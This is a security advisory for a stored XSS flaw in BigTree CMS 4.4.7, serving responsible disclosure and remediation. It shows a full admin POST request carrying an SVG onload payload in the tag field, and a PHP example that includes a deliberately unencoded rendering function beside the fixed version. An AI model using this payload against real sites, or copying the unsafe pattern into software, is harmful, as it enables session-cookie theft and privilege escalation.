BigTree CMS – XSS Vulnerability in Version 4.4.7


Product Information:

Software: BigTree CMS

Tested Version: 4.4.7, released 16.10.2019

Vulnerability Type: Cross-Site Scripting (CWE-79)

Description: BigTree is an extremely extensible open-source CMS built on PHP and MySQL. (excerpt copied from https://www.bigtreecms.org/)


The following is a POST request to create a tag with the payload:

POST /admin/tags/create/ HTTP/1.1
Host: demo.bigtreecms.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://demo.bigtreecms.org
Connection: close
Referer: https://demo.bigtreecms.org/admin/tags/add/
Cookie: PHPSESSID=giqced7qd6sqkrb6i2tdndbvl1; bigtree_admin[page_properties_open]=on; bigtree_admin[email][email protected]; bigtree_admin[login]=["session-5e419446c4d265.05914498","chain-5e419446c4c097.13460452"]
Upgrade-Insecure-Requests: 1

tag="><svg/onload=alert(/xss/)/>

Impact:

A user with tag-adding capability is able to steal the cookie of another user with higher privilege.


Solution:

  • Update to BigTree CMS version 4.4.9.
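
The following is an added example, not BigTree's code or the vendor's patch. It shows the general defect class behind the payload above (a stored tag written into an HTML attribute without encoding) next to the encoded form, plus a helper for reviewing tags that were stored before the upgrade. The markup, function names and sample rows are assumptions made for illustration.

```php
<?php
// Added illustration; the markup below is hypothetical, not BigTree's admin template.

// Vulnerable pattern: the stored tag is concatenated into an attribute value as-is,
// so a leading "> closes the attribute and the element.
function render_tag_unsafe(string $tag): string
{
    return '<input type="text" name="tag" value="' . $tag . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
function render_tag_safe(string $tag): string
{
    $encoded = htmlspecialchars($tag, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="tag" value="' . $encoded . '">';
}

// Audit helper: return stored tags that contain HTML-significant characters,
// i.e. values that encoding would change. Benign tags such as "R&D" are
// flagged too, so treat the result as a review list, not a verdict.
function find_suspicious_tags(array $tags): array
{
    return array_values(array_filter($tags, function (string $tag): bool {
        return htmlspecialchars($tag, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') !== $tag;
    }));
}

// Constructed sample rows; the second is the payload from the request above.
$storedTags = ['news', '"><svg/onload=alert(/xss/)/>', 'events'];

foreach ($storedTags as $tag) {
    echo 'unsafe: ', render_tag_unsafe($tag), PHP_EOL;
    echo 'safe:   ', render_tag_safe($tag), PHP_EOL;
}

echo 'flagged for review:', PHP_EOL;
foreach (find_suspicious_tags($storedTags) as $tag) {
    // Encode again so the audit output is itself safe to view in a browser.
    echo '  ', htmlspecialchars($tag, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'), PHP_EOL;
}
```

Run from the command line, the unsafe line for the payload shows the `svg` element outside the `value` attribute, while the safe line keeps the whole string inside it as inert text.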

Timeline:

Vulnerability found: 11.02.2020

Vendor informed: 11.02.2020

Vendor responded: 13.02.2020

Bug fixed: 28.02.2020

Version 4.4.9 released: 06.03.2020

Public Advisory: 06.04.2020


References:

https://github.com/bigtreecms/BigTree-CMS/commit/7a588580958c74dbb820991d37d7b3c8f0843668

https://github.com/bigtreecms/BigTree-CMS/commit/c34c2a7623d153549e63188eadf7ff40200b8b11